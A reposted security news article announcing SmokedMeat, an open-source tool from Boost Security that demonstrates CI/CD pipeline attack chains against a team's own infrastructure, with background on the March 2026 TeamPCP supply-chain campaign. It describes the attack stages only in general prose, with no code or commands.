SmokedMeat: Open-source tool shows what attackers do inside CI/CD pipelines

By ice41 | 12:12 AM Leave a Comment

Boost Security has released SmokedMeat, an open-source framework that runs attack chains against CI/CD infrastructure so engineering and security teams can see what an attacker would do in their specific environment.

SmokedMeat

What the tool does

SmokedMeat takes a flagged pipeline vulnerability and executes a live demonstration against a team’s own infrastructure. Starting from a single vulnerability, it deploys a payload, compromises the runner, harvests credentials from process memory, exchanges those credentials for cloud access, exposes private repositories, and maps the blast radius of the attack.

Zaid Al Hamami, CEO of Boost Security, described the scope: “This tool is showing what attackers can do; they can find a vulnerability in an open source repo, craft an exploit payload, steal credentials in that repo, and use those credentials to pivot to other areas, insert malware, infect developers working on those repos.”

The TeamPCP attack that changed the conversation

In March 2026, a coordinated campaign known as TeamPCP compromised Trivy, Checkmarx, LiteLLM, and dozens of npm packages. The attack used techniques that Boost Labs had documented in prior research. Boost’s open-source scanner, Poutine, had flagged vulnerabilities in Trivy’s pipeline months before the attack. Those findings went unpatched. Al Hamami described the campaign as the largest cascade supply chain attack to date.

The backlog problem

Boost Labs had been publishing research on CI/CD attack techniques for years, documenting how attackers move through build pipelines, steal credentials, and pivot into cloud environments. A static scan result that flags “workflow injection possible” does not convey what an attacker can do with that injection in a matter of seconds. Without a concrete demonstration, remediation work tends to stay deprioritized.

SmokedMeat is designed to close that gap by running the attack scenario against real infrastructure, giving security teams and engineering leaders a concrete view of what exploitation looks like in their own environment.

SmokedMeat is available for free on GitHub.

Must read:

Subscribe to the Help Net Security ad-free monthly newsletter to stay informed on the essential open-source cybersecurity tools. Subscribe here!


from Help Net Security https://ift.tt/GIrLqwg
Related Items

0 comments:

Post a Comment